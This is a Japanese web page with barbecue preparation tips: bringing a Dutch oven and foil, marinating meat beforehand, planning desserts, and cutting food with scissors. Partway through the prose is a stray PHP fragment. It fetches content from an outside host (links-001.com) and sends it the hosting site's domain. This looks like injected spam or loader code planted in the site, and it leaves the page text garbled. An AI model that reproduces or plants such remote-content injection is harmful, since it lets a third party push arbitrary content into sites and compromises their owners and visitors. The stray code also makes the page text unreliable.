前へ
次へ

バーベキューを行う前にある程度用意しておこう

バーベキューだと調理器具や食材が制限されるから、なかなか凝った物を作ることができないのではないかと考える人が少なくありません。
しかし、ちょっとした工夫を凝らすことによって、バーベキューでもこだわりのある調理を行うことが可能となるため、参考にしてください。
ちょっとした工夫に必要なアイテムとしてあげられるのが、ダッチオーブンとアルミホイルです。
ダッチオーブンはアウトドア用品店で購入できます。
直火にかけて仕えるオーブンのような存在で、ケーキを焼いたりご飯を炊くことも可能です。
また、アルミホイルは工夫次第で食材をおいしく調理するための手軽なアイテムとしても有名なので、必ず持って行きましょう。
バーベキューではなるべく手間を省いて調理をすることが望ましいといわれているため、出かける前に必ず下ごしらえできるものは徹底的に下ごしらえして行って下さい。
特に肉類をソースにつけておくことは基本中の基本です。
魚や野菜であっても下ごしらえをしておいたほうがいいものは、必ず下ごしらえを行い、当日あわてずに済むようにすることが望ましいといわれています。
また、デザートなどを必要とするかどうかは参加するメンバーによって異なりますが、甘い物が好きな人や子供が多いのであれば用意しておいたほうがいいでしょう。
なお、現場で調理をすることもできますが、前もって現場であわてずに済むようにしておくことも必要です。
デザートはフルーツやヨーグルトを持参するだけでもいいので、無理して用意しないでください。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

調理を行う時には水場が近いところで行うことで、あわてずにすむでしょう。
また、周囲の人の迷惑にならないように行動することも必要といわれているため、行動をするときには注意してください。
包丁をつかえない年齢の子供がいる場合や、包丁を持っていくことに不安を感じる場合はハサミを持参すると肉も野菜も手軽に切ることができます。
ただし、肉を切ったハサミは後日切れが悪くなるため、研ぎ師に出せるモノ化使い捨てで切る物を用意しましょう。

Page Top